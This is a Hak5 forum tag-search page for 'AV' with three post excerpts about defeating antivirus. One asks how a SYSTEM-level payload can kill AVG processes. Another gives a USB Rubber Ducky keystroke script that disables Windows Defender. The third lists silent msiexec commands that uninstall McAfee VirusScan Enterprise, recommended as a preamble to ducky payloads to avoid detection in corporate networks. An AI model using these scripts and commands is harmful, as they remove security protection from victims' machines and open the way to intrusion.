Jump to content

Search the Community

Showing results for tags 'AV'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 3 results

  1. Hey, i recently tried to kill the AV Processes of for example AVG. My payload had SYSTEM privileges but i couldn't kill the AV Processes which also run under the SYSTEM user. I noticed a process which ran higher than SYSTEM which belonged to AVG. Is it common thats a av has some sort of process which runs in kernel mode or sth which protects the other processes. Is there even a way to kill the av as a System user?
  2. Hello all, I've put together a simple script that attempts to disable Windows Defender on Windows 8.1 (will update to 7 later). My only problem is that I have an issue where there is a check box titled "turn on this app" and when I tab over to it, there is no way for me to uncheck that selection. I hope that someone might either find a work around to my method or find a way to make it work. Thank you Disable Windows Defender: REM Author : Hobbes REM Description : Attempts to disable Windows Defender anti-virus. REM Note : Only tested on Windows 8.1 - Windows 7 compatibility unknown. REM ***[Initial Delay]*** DELAY 3000 REM ***[Navigate to Windows Defender]*** GUI r DELAY 250 STRING cmd ENTER DELAY 800 STRING start "" "C:\Program Files\Windows Defender\MSASCui.exe" ENTER DELAY 400 REM **[Disables Defender]*** TAB DELAY 80 TAB DELAY 80 RIGHTARROW DELAY 80 RIGHTARROW DELAY 80 RIGHTARROW DELAY 80 TAB DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 TAB
  3. I found the following little tid bit that has been of great use in corporate environments. Simply adding the appropriate line toward the top of your ducky script (or adding them all just in case works too) can significantly decrease AV detection (considering it removes it from the equation!) :D VirusScan Enterprise (VSE) command line removal using msiexec.exe: Click Start, Run. Type the removal string for your version of VSE, then click OK. VirusScan Enterprise 8.8 msiexec /x {CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF} REMOVE=ALL REBOOT=R /q VirusScan Enterprise 8.7i msiexec /x {147BCE03-C0F1-4C9F-8157-6A89B6D2D973} REMOVE=ALL REBOOT=R /q VirusScan Enterprise 8.5i msiexec.exe /x {35C03C04-3F1F-42C2-A989-A757EE691F65} REMOVE=ALL REBOOT=R /q VirusScan Enterprise 8.0i msiexec.exe /x {5DF3D1BB-894E-4DCD-8275-159AC9829B43} REMOVE=ALL REBOOT=R /q Switches that you can use with msiexec.exe: /q The quiet switch ensures the removal is done silently - nothing is displayed. /x This switch will automatically remove an installation. /i This switch will communicate via the UI (User Interface) and is used to Repair, Remove, or Modify an installation. /? This switch provides additional information on all msiexec.exe command switches.
×
×
  • Create New...